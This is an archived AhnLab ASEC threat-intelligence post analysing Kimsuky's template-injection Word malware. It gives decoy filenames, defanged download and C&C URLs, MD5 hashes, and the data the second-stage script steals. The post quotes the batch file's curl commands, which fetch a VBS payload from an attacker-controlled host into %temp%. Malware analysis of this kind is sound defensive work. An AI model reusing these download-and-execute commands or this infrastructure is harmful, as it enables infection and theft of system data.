Malware Disguised as Normal Documents (Kimsuky) - ASEC By ATCP Published: 2023-02-02 · Archived: 2026-04-05 18:38:29 UTC The ASEC analysis team has recently discovered that the malware introduced in the post, , is being distributed to broadcasting and ordinary companies as well as those in the security-related field. Identical to the malware introduced in the blog post above, all the malware documents utilize the template injection technique and download malicious word macro documents to execute themselves. The distributed filenames are as follows: [kbs Sunday Diagnosis] Questionnaire.docx Im ** Cover Letter.docx app-planning – copy.docx https://asec.ahnlab.com/en/47585/ Page 1 of 5 To facilitate the execution of the malicious macro code, the threat actor used an image that prompts users to execute the macro. The image has been constantly used since the past and is suspected to be all from the same operator. Below is a list of download URLS of malicious Word macro documents we have additionally identified. hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm hxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm hxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm When the malicious macro inside the downloaded document is executed, it generates and runs the version.bat file that contains the curl command. The batch file includes codes that download and execute a normal document and additional malicious script. The used curl commands are as follows. curl -o “”” & fname & “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx curl -o %temp%\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60 Confirmed normal documents disguised themselves cover letters, application proposals, and more. https://asec.ahnlab.com/en/47585/ Page 2 of 5 https://asec.ahnlab.com/en/47585/ Page 3 of 5 Identical to the previous findings, the additional malicious script leaks the following data to the C&C server. Infected PC system information Information on virus vaccines installed on the system List of recently opened Word files Directory information of the download folder in the system Information of running processes Modification of IE-related registries Registration to the task scheduler to maintain a connection to the C&C server The confirmed C&C URLs are as follows. hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/show.php hxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/show.php hxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/show.php Recently, malware cases targeting North Korea-related individuals are also being distributed to ordinary corporate users, calling for their utmost precaution. Users must therefore refrain from viewing emails from unknown senders and take caution so that macros included in Office documents do not run automatically. [File Detection] Downloader/DOC.External (2023.02.03.03) Downloader/DOC.Kimsuky (2023.02.07.00) MD5 3cdf9f829ed03e1ac17b72b636d84d0b https://asec.ahnlab.com/en/47585/ Page 4 of 5 55a46a2415d18093abcd59a0bf33d0a9 705ef00224f3f7b02e29f21eb6e10d02 83b4d96fc75f74bb589c28e8a9eddbbf 873b2b0656ee9f6912390b5abc32b276 Additional IOCs are available on AhnLab TIP. URL http[:]//ddim[.]co[.]kr/gnuboard4/adm/cmg/upload/init[.]dotm http[:]//gdtech[.]kr/gnuboard4/adm/cmg/attatch/init[.]dotm http[:]//gdtech[.]kr/gnuboard4/adm/cmg/upload/list[.]php?query=60 http[:]//www[.]hydrotec[.]co[.]kr/bbs/img/cmg/upload2/init[.]dotm http[:]//www[.]hydrotec[.]co[.]kr/bbs/img/cmg/upload3/init[.]dotm Additional IOCs are available on AhnLab TIP. Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below. Source: https://asec.ahnlab.com/en/47585/ https://asec.ahnlab.com/en/47585/ Page 5 of 5